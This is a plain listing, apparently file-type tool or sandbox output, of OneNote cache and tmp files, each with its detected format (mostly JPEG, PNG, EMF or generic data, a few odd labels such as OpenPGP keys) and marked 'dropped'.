C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006E.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006G.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006I.bin (copy)
PNG image data, 50 x 556, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006K.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006M.bin (copy)
PNG image data, 171 x 552, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006O.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006Q.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006R.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006T.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin (copy)
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006V.bin (copy)
PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin (copy)
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000071.bin (copy)
PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin (copy)
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin (copy)
PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000074.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000077.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000079.bin (copy)
PNG image data, 50 x 500, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007B.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007D.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007F.bin (copy)
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin (copy)
PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007H.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin (copy)
PNG image data, 39 x 600, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007J.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007L.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007N.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007P.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007S.bin (copy)
PNG image data, 39 x 579, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007U.bin (copy)
PNG image data, 30 x 700, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000080.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000082.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000084.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000086.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000088.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008A.bin (copy)
PNG image data, 85 x 470, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008B.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008C.bin (copy)
PNG image data, 88 x 574, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008E.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008G.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008I.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008K.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008M.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin (copy)
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008O.bin (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008P.bin (copy)
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header
Matlab v4 mat-file (little endian) \350\001, numeric, rows 1051426662, columns 0
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000001.bin
386 compact demand paged pure executable not stripped
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000002.bin
SysEx File -
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000003.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000004.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin
PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin
ASCII text, with very long lines (585), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin
PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin
GIF image data, version 89a, 1012 x 327
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin
PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin
PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000L.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001A.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001B.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001S.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin
big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin
big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003L.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003M.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003N.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003O.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003P.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin
big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin
data
dropped
